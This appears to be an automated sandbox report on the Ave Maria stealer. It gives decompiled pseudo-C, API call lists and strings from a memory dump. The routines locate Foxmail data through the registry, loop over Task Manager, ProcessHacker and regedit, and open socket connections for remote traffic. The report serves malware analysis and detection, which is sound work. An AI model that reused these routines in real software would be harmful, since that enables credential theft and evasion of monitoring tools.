                                    • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                    • Part of subcall function 00410F61: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                    • Part of subcall function 00410F61: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                    • Part of subcall function 004111D7: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00402F1A
                                  • lstrcatW.KERNEL32 ref: 00402F2C
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402F3A
                                    • Part of subcall function 0040906F: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                    • Part of subcall function 0040906F: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                    • Part of subcall function 0040906F: EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                    • Part of subcall function 0040906F: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                    • Part of subcall function 0040906F: LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                  • String ID: \Microsoft Vision\
                                  • API String ID: 1987359387-1618823865
                                  • Opcode ID: f0dc2ad6ea702e7073f60f83b80db7d883d1c1c031e6252cb074b5a7b31379b8
                                  • Instruction ID: 851052fb16c6d29596c0b523666286a16417f9887d42e77abec1e0ca40aba6c7
                                  • Opcode Fuzzy Hash: f0dc2ad6ea702e7073f60f83b80db7d883d1c1c031e6252cb074b5a7b31379b8
                                  • Instruction Fuzzy Hash: 56318571A005197BCF14FBA2DC46DEEB77CAF44308F00046EB205B21D1DA7C5A858B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00412049(void* __ecx, void* __eflags) {
                                  				void* _v8;
                                  				char _v12;
                                  				char _v16;
                                  				intOrPtr _v40;
                                  				char _v44;
                                  				void* _t15;
                                  				intOrPtr* _t16;
                                  				intOrPtr _t34;
                                  				void* _t45;
                                  
                                  				_t45 = __eflags;
                                  				_t15 = E00411E6D();
                                  				_push(__ecx);
                                  				_t16 = E00411E88(_t15, "VirtualQuery", _t45);
                                  				if(_t16 != 0) {
                                  					_t16 =  *_t16(E00412049,  &_v44, 0x1c);
                                  					_t34 = _v40;
                                  					_t47 = _t34;
                                  					if(_t34 != 0) {
                                  						E00411CE3(_t34, _t47);
                                  						MessageBoxA(0, "Bla2", "Bla2", 0);
                                  						_push(_t34);
                                  						_v12 = 0;
                                  						E004120F8( &_v16, _t47, E004036F7( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
                                  						E00405FEB(_v8);
                                  						_v8 = 0;
                                  						E00405FEB(0);
                                  						_push(0);
                                  						_v12 = 0;
                                  						E004120F8( &_v16, _t47, E004036F7( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
                                  						E00405FEB(_v8);
                                  						_v8 = 0;
                                  						return E00405FEB(0);
                                  					}
                                  				}
                                  				return _t16;
                                  			}
                                  APIs
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  • MessageBoxA.USER32 ref: 0041208F
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 004120F8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  • Bla2, xrefs: 00412086, 0041208C, 0041208D
                                  • VirtualQuery, xrefs: 00412056
                                  • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 004120CD
                                  • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0041209D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                  • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                  • API String ID: 1196126833-2308542105
                                  • Opcode ID: 3acb6732effa49e07be3e8a40aa91923fc631926421db321b1f2545d5e959105
                                  • Instruction ID: b002b8fab82c5f8035800c071d4aecb67a577e28dec50426e7e7b6f2e11e6f57
                                  • Opcode Fuzzy Hash: 3acb6732effa49e07be3e8a40aa91923fc631926421db321b1f2545d5e959105
                                  • Instruction Fuzzy Hash: C2113D71A40119BACB08EBA5D956CEF7B7CAE08704B10416FB502B2181DF785F85D6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C5E8(void* __ecx) {
                                  				void* _t13;
                                  				void* _t25;
                                  
                                  				_t25 = __ecx;
                                  				if(__ecx != 0) {
                                  					if( *(__ecx + 0x30) != 0) {
                                  						LocalFree( *(__ecx + 0x30));
                                  					}
                                  					if( *(_t25 + 0x40) != 0) {
                                  						LocalFree( *(_t25 + 0x40));
                                  					}
                                  					if( *(_t25 + 0x48) != 0) {
                                  						LocalFree( *(_t25 + 0x48));
                                  					}
                                  					if( *(_t25 + 0x58) != 0) {
                                  						LocalFree( *(_t25 + 0x58));
                                  					}
                                  					if( *(_t25 + 0x60) != 0) {
                                  						LocalFree( *(_t25 + 0x60));
                                  					}
                                  					if( *(_t25 + 0x68) != 0) {
                                  						LocalFree( *(_t25 + 0x68));
                                  					}
                                  					return LocalFree(_t25);
                                  				}
                                  				return _t13;
                                  			}
                                  0x0040c5e9
                                  0x0040c5ed
                                  0x0040c5fa
                                  0x0040c5ff
                                  0x0040c5ff
                                  0x0040c605
                                  0x0040c60a
                                  0x0040c60a
                                  0x0040c610
                                  0x0040c615
                                  0x0040c615
                                  0x0040c61b
                                  0x0040c620
                                  0x0040c620
                                  0x0040c626
                                  0x0040c62b
                                  0x0040c62b
                                  0x0040c631
                                  0x0040c636
                                  0x0040c636
                                  0x00000000
                                  0x0040c63b
                                  0x0040c63d

                                  APIs
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C5FF
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C60A
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C615
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C620
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C62B
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C636
                                  • LocalFree.KERNEL32(00000000,00000000,00000000,0040C25A), ref: 0040C639
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLocal
                                  • String ID:
                                  • API String ID: 2826327444-0
                                  • Opcode ID: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                  • Instruction ID: 62e6c422cf591d6120044b1c94743719a7044ae546b32db2f753074c0c434ab8
                                  • Opcode Fuzzy Hash: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                  • Instruction Fuzzy Hash: 6BF0EC30011B14DBD7326B26CC447A7B6A1BF80305F151E3AD08121AB0C77AA896DF48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004094FF(void* __ecx) {
                                  				int _v8;
                                  				void* _v12;
                                  				void* _t7;
                                  
                                  				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
                                  					L3:
                                  					_t7 = 0;
                                  				} else {
                                  					_v8 = 0x104;
                                  					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x426868,  &_v8) != 0) {
                                  						goto L3;
                                  					} else {
                                  						PathRemoveFileSpecA(0x426868);
                                  						_t7 = 1;
                                  					}
                                  				}
                                  				return _t7;
                                  			}
                                  0x00409522
                                  0x00409556
                                  0x00409556
                                  0x00409524
                                  0x00409527
                                  0x00409549
                                  0x00000000
                                  0x0040954b
                                  0x0040954c
                                  0x00409552
                                  0x00409552
                                  0x00409549
                                  0x0040955a

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 0040951A
                                  • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,00426868,?), ref: 00409541
                                  • PathRemoveFileSpecA.SHLWAPI(00426868), ref: 0040954C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileOpenPathQueryRemoveSpecValue
                                  • String ID: Executable$software\Aerofox\FoxmailPreview
                                  • API String ID: 3687894118-2371247776
                                  • Opcode ID: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                  • Instruction ID: da810012986fcb6c8d8d394bbe01705385cba6e4fa72d30e5428379b1b1cd6da
                                  • Opcode Fuzzy Hash: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                  • Instruction Fuzzy Hash: 59F0A7B5784304BAEB509B46DC46FDB3BBC9755B04F200079BA05B11C2D2B49A45952C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0041046E(intOrPtr __ecx) {
                                  				char _v5;
                                  				char _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				void _v32;
                                  				signed int _v36;
                                  				long _v40;
                                  				char _v49;
                                  				char _v52;
                                  				intOrPtr _v72;
                                  				char _v76;
                                  				char _v80;
                                  				void _v84;
                                  				char _v100;
                                  				char _v2156;
                                  				void* _t61;
                                  				char _t64;
                                  				intOrPtr _t70;
                                  				signed int _t77;
                                  				void* _t87;
                                  				void* _t95;
                                  				void* _t99;
                                  				signed int _t100;
                                  				signed int _t102;
                                  				void* _t111;
                                  				signed int _t115;
                                  				void* _t119;
                                  				intOrPtr _t123;
                                  				void* _t133;
                                  				void* _t134;
                                  				void* _t137;
                                  
                                  				 *0x559cac = __ecx;
                                  				while(1) {
                                  					_t61 = E0041075C( &_v100);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					if( *0x426755 == 0) {
                                  						break;
                                  					}
                                  					_t99 = 0xc;
                                  					_v5 = 0;
                                  					_t95 = E00406099(_t99);
                                  					if(_t95 == 0) {
                                  						_t95 = 0;
                                  					} else {
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  					}
                                  					_t100 = _v32;
                                  					_t3 = 0x426980 + _t100 * 0xc; // 0x426980
                                  					_t119 = _t3;
                                  					if( *_t119 != _t100) {
                                  						_t64 = _v5;
                                  					} else {
                                  						_t64 = 1;
                                  						_t95 = _t119;
                                  					}
                                  					if(_t64 != 0) {
                                  						if( *((char*)(_t95 + 4)) != 1) {
                                  							_t130 = _v24;
                                  							__imp__#19( *(_t95 + 8), _v24, _v28, 0);
                                  						} else {
                                  							E00401052( &_v2156, 0, 0x802);
                                  							_v20 = _v20 & 0;
                                  							_v16 = _v16 & 0;
                                  							_t102 = 8;
                                  							memset( &_v84, 0, _t102 << 2);
                                  							_t137 = _t137 + 0x18;
                                  							asm("stosd");
                                  							asm("stosd");
                                  							asm("stosw");
                                  							_t123 = _v24;
                                  							_t70 =  *((intOrPtr*)(_t123 + 3));
                                  							if(_t70 != 1) {
                                  								if(_t70 != 3) {
                                  									if(_t70 == 4) {
                                  										__imp__InetNtopW(0x17, _t123 + 4,  &_v2156, 0x802);
                                  										_t77 = E0041085B(_t123 + 4,  *(_t123 + 8) & 0x0000ffff);
                                  										goto L18;
                                  									}
                                  								} else {
                                  									E00401052( &_v84, 0, 0x20);
                                  									_v80 = 2;
                                  									_v76 = 1;
                                  									_v72 = 6;
                                  									_t133 = E00401085(0x200);
                                  									E0040102C(_t133, _t123 + 5,  *((char*)(_t123 + 4)));
                                  									_v36 = _v36 & 0x00000000;
                                  									E0040102C( *((char*)(_t123 + 4)) + _t133,  &_v36, 1);
                                  									_t137 = _t137 + 0x28;
                                  									_t87 =  &_v84;
                                  									__imp__getaddrinfo(_t133, 0, _t87,  &_v20);
                                  									if(_t87 == 0) {
                                  										_t115 =  *( *((char*)(_t123 + 4)) + _t123 + 5) & 0x0000ffff;
                                  										_t111 =  *((intOrPtr*)(_v20 + 0x18)) + 4;
                                  										goto L12;
                                  									}
                                  								}
                                  							} else {
                                  								_t134 = _t123 + 4;
                                  								__imp__InetNtopW(2, _t134,  &_v2156, 0x802);
                                  								_t115 =  *(_t123 + 8) & 0x0000ffff;
                                  								_t111 = _t134;
                                  								L12:
                                  								_t77 = E004108DC(_t111, _t115);
                                  								L18:
                                  								_v16 = _t77;
                                  							}
                                  							_v52 = 5;
                                  							_v49 = 1;
                                  							E004106F9( &_v52, 0xa, _v32);
                                  							 *(_t95 + 8) = _v16;
                                  							 *((char*)(_t95 + 4)) = 2;
                                  							_v40 = 0;
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							CreateThread(0, 0, E0041068D, _t95, 0,  &_v40);
                                  							_t130 = _v24;
                                  						}
                                  						E00401099(_t130);
                                  					} else {
                                  						_v12 = 5;
                                  						E004106F9( &_v12, 2, _t100);
                                  						 *((char*)(_t95 + 4)) = 1;
                                  						 *_t95 = _v32;
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  					}
                                  				}
                                  				return _t61;
                                  			}
                                  0x00410477
                                  0x00410669
                                  0x0041066d
                                  0x0041067f
                                  0x00410680
                                  0x00410681
                                  0x00410682
                                  0x00000000
                                  0x00000000
                                  0x00410487
                                  0x00410488
                                  0x00410491
                                  0x00410495
                                  0x004104a0
                                  0x00410497
                                  0x0041049b
                                  0x0041049c
                                  0x0041049d
                                  0x0041049d
                                  0x004104a2
                                  0x004104a8
                                  0x004104a8
                                  0x004104b0
                                  0x004104b8
                                  0x004104b2
                                  0x004104b2
                                  0x004104b4
                                  0x004104b4
                                  0x004104bd
                                  0x004104e8
                                  0x00410650
                                  0x0041065c
                                  0x004104ee
                                  0x004104fc
                                  0x00410509
                                  0x0041050c
                                  0x00410511
                                  0x00410512
                                  0x00410512
                                  0x00410517
                                  0x00410518
                                  0x00410519
                                  0x0041051b
                                  0x0041051e
                                  0x00410523
                                  0x0041054f
                                  0x004105d9
                                  0x004105ed
                                  0x004105f9
                                  0x00000000
                                  0x004105f9
                                  0x00410555
                                  0x0041055d
                                  0x00410567
                                  0x0041056e
                                  0x00410575
                                  0x00410585
                                  0x0041058d
                                  0x00410592
                                  0x004105a3
                                  0x004105a8
                                  0x004105af
                                  0x004105b6
                                  0x004105be
                                  0x004105c4
                                  0x004105cf
                                  0x00000000
                                  0x004105cf
                                  0x004105be
                                  0x00410525
                                  0x00410531
                                  0x00410537
                                  0x0041053d
                                  0x00410541
                                  0x00410543
                                  0x00410543
                                  0x004105fe
                                  0x004105fe
                                  0x004105fe
                                  0x0041060a
                                  0x00410610
                                  0x00410614
                                  0x00410623
                                  0x0041062e
                                  0x00410635
                                  0x0041063a
                                  0x00410642
                                  0x00410644
                                  0x00410645
                                  0x0041064b
                                  0x0041064b
                                  0x00410663
                                  0x004104bf
                                  0x004104c5
                                  0x004104cb
                                  0x004104d5
                                  0x004104d9
                                  0x004104dc
                                  0x004104dd
                                  0x004104de
                                  0x004104de
                                  0x00410668
                                  0x0041068c

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                  • Instruction ID: a997fb7a83d2290818e28b31fbf57bc7f8b037a2cfd84f52b4588474c50995db
                                  • Opcode Fuzzy Hash: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                  • Instruction Fuzzy Hash: 8961D871904218EEDB10CF95CC45BEFB7B9BF04304F00816AF945BB281D7B9A985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F086() {
                                  				signed int _v8;
                                  				char _v12;
                                  				signed int _v16;
                                  				char _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				void* _t26;
                                  				void* _t29;
                                  				signed int _t32;
                                  				signed int _t35;
                                  				void* _t42;
                                  				void* _t56;
                                  				void* _t58;
                                  				void* _t59;
                                  				signed int _t60;
                                  				signed int _t61;
                                  				signed int _t62;
                                  				void* _t64;
                                  
                                  				_t64 = (_t62 & 0xfffffff8) - 0x1c;
                                  				_t42 = 0;
                                  				_v16 = _v16 & 0;
                                  				_t56 = 0;
                                  				_v8 = _v8 & 0;
                                  				L1:
                                  				_t26 = E00412155(E004036F7( &_v28, L"explorer.exe"));
                                  				_t45 = _v32;
                                  				_t58 = _t26;
                                  				E00405FEB(_v32);
                                  				_v32 = _v32 & 0x00000000;
                                  				if(_t58 != 0 && _t58 != _t56) {
                                  					_t56 = _t58;
                                  					E00407B2E(_t45, _t45, _t58);
                                  					_t64 = _t64 + 0xc;
                                  				}
                                  				_t29 = E00412155(E004036F7( &_v24, L"TASKmgr.exe"));
                                  				_t48 = _v28;
                                  				_t59 = _t29;
                                  				E00405FEB(_v28);
                                  				_v28 = _v28 & 0x00000000;
                                  				if(_t59 != 0 && _t59 != _t42) {
                                  					_t42 = _t59;
                                  					E00407B2E(_t48, _t48, _t59);
                                  					_t64 = _t64 + 0xc;
                                  				}
                                  				_t32 = E00412155(E004036F7( &_v20, L"ProcessHacker.exe"));
                                  				_t51 = _v24;
                                  				_t60 = _t32;
                                  				E00405FEB(_v24);
                                  				_v24 = _v24 & 0x00000000;
                                  				if(_t60 != 0 && _t60 != _v16) {
                                  					_v16 = _t60;
                                  					E00407B2E(_t51, _t51, _t60);
                                  					_t64 = _t64 + 0xc;
                                  				}
                                  				_t35 = E00412155(E004036F7( &_v12, L"regedit.exe"));
                                  				_t54 = _v16;
                                  				_t61 = _t35;
                                  				E00405FEB(_v16);
                                  				_v16 = _v16 & 0x00000000;
                                  				if(_t61 != 0 && _t61 != _v8) {
                                  					_v8 = _t61;
                                  					E00407B2E(_t54, _t54, _t61);
                                  					_t64 = _t64 + 0xc;
                                  				}
                                  				Sleep(0x3e8);
                                  				goto L1;
                                  			}
                                  0x0040f08c
                                  0x0040f091
                                  0x0040f093
                                  0x0040f098
                                  0x0040f09a
                                  0x0040f09e
                                  0x0040f0ae
                                  0x0040f0b3
                                  0x0040f0b7
                                  0x0040f0b9
                                  0x0040f0be
                                  0x0040f0c5
                                  0x0040f0ce
                                  0x0040f0d0
                                  0x0040f0d5
                                  0x0040f0d5
                                  0x0040f0e8
                                  0x0040f0ed
                                  0x0040f0f1
                                  0x0040f0f3
                                  0x0040f0f8
                                  0x0040f0ff
                                  0x0040f108
                                  0x0040f10a
                                  0x0040f10f
                                  0x0040f10f
                                  0x0040f122
                                  0x0040f127
                                  0x0040f12b
                                  0x0040f12d
                                  0x0040f132
                                  0x0040f139
                                  0x0040f144
                                  0x0040f148
                                  0x0040f14d
                                  0x0040f14d
                                  0x0040f160
                                  0x0040f165
                                  0x0040f169
                                  0x0040f16b
                                  0x0040f170
                                  0x0040f177
                                  0x0040f182
                                  0x0040f186
                                  0x0040f18b
                                  0x0040f18b
                                  0x0040f193
                                  0x00000000

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00412155: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                    • Part of subcall function 00412155: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                    • Part of subcall function 00412155: CloseHandle.KERNEL32(00000000), ref: 004121C1
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • Sleep.KERNEL32(000003E8), ref: 0040F193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CloseCreateFirstFreeHandleProcess32SleepSnapshotToolhelp32Virtuallstrcpy
                                  • String ID: ProcessHacker.exe$TASKmgr.exe$explorer.exe$regedit.exe
                                  • API String ID: 1522922855-2180853415
                                  • Opcode ID: cde1bf2012f518953154dd03a6652405606b31095ca48fa773f12743569a33e4
                                  • Instruction ID: 1100a8f027d8646bfe9cbc7498619969e67dd2afa5e15d5111ff53f3380e378b
                                  • Opcode Fuzzy Hash: cde1bf2012f518953154dd03a6652405606b31095ca48fa773f12743569a33e4
                                  • Instruction Fuzzy Hash: 6321C471D053516BC724FF21C946AAFB6949F84759F040A3EF844733C2EA7CAE09C69A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004103D3
                                  • gethostbyname.WS2_32(?), ref: 004103DC
                                  • htons.WS2_32(?), ref: 00410400
                                  • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 00410431
                                  • connect.WS2_32(00000000,?,00000010), ref: 0041044A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InetNtopconnectgethostbynamehtonssocket
                                  • String ID:
                                  • API String ID: 2393792429-0
                                  • Opcode ID: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                  • Instruction ID: 727c1264bc9e30e98f597feacc0b668f5efde6c0f62ffec738b6da8cc58ee6c9
                                  • Opcode Fuzzy Hash: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                  • Instruction Fuzzy Hash: 851103B2900258BBE71097A4AC4AFEB7BBCEF05724F008476FD55D7191E6B4894487A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041221F(signed int* __ecx, void* __edx) {
                                  				char _v524;
                                  				intOrPtr _v552;
                                  				void* _v560;
                                  				struct tagPROCESSENTRY32W* _t8;
                                  				void* _t14;
                                  				void* _t18;
                                  				signed int* _t19;
                                  
                                  				_t14 = __edx;
                                  				_v560 = 0x22c;
                                  				_t19 = __ecx;
                                  				_t18 = CreateToolhelp32Snapshot(2, 0);
                                  				if(_t18 == 0xffffffff) {
                                  					L6:
                                  					 *_t19 =  *_t19 & 0x00000000;
                                  				} else {
                                  					_t8 =  &_v560;
                                  					Process32FirstW(_t18, _t8);
                                  					while(_t8 != 0) {
                                  						if(_v552 == _t14) {
                                  							CloseHandle(_t18);
                                  							E004036F7(_t19,  &_v524);
                                  						} else {
                                  							_t8 = Process32NextW(_t18,  &_v560);
                                  							continue;
                                  						}
                                  						goto L7;
                                  					}
                                  					CloseHandle(_t18);
                                  					goto L6;
                                  				}
                                  				L7:
                                  				return _t19;
                                  			}

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041223D
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412252
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041226A
                                  • CloseHandle.KERNEL32(00000000), ref: 00412275
                                  • CloseHandle.KERNEL32(00000000), ref: 00412286
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 1789362936-0
                                  • Opcode ID: 7c51ae1583fb216e303a586e611b021214649dc21615591d09c98e01ade8ed9e
                                  • Instruction ID: debd20abf717d3e205526d08b8a6d3eb8db8cce60d0d25a78bdd72c07f1bd50f
                                  • Opcode Fuzzy Hash: 7c51ae1583fb216e303a586e611b021214649dc21615591d09c98e01ade8ed9e
                                  • Instruction Fuzzy Hash: BE01D6312042147BCB205BA4AC4DBFE77BCAB48761F1080AAF505D2290D7B889828A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B10E(void* __ecx) {
                                  				int _t15;
                                  				void* _t18;
                                  
                                  				_t18 = __ecx;
                                  				FreeLibrary( *(__ecx + 0xb4));
                                  				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                  				FreeLibrary( *(_t18 + 0xa8));
                                  				 *(_t18 + 0xa8) = 0;
                                  				FreeLibrary( *(_t18 + 0xac));
                                  				 *(_t18 + 0xac) = 0;
                                  				FreeLibrary( *(_t18 + 0xb8));
                                  				 *(_t18 + 0xb8) = 0;
                                  				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                  				 *(_t18 + 0xb0) = 0;
                                  				return _t15;
                                  			}

                                  APIs
                                  • FreeLibrary.KERNEL32(?,00000001,?,00000000,0040A897), ref: 0040B11F
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B12F
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B13D
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B14B
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B159
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                  • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040AD8C(void* __ecx) {
                                  				int _t15;
                                  				void* _t18;
                                  
                                  				_t18 = __ecx;
                                  				FreeLibrary( *(__ecx + 0xb4));
                                  				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                  				FreeLibrary( *(_t18 + 0xa8));
                                  				 *(_t18 + 0xa8) = 0;
                                  				FreeLibrary( *(_t18 + 0xac));
                                  				 *(_t18 + 0xac) = 0;
                                  				FreeLibrary( *(_t18 + 0xb8));
                                  				 *(_t18 + 0xb8) = 0;
                                  				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                  				 *(_t18 + 0xb0) = 0;
                                  				return _t15;
                                  			}

                                  APIs
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040AD9D
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADAD
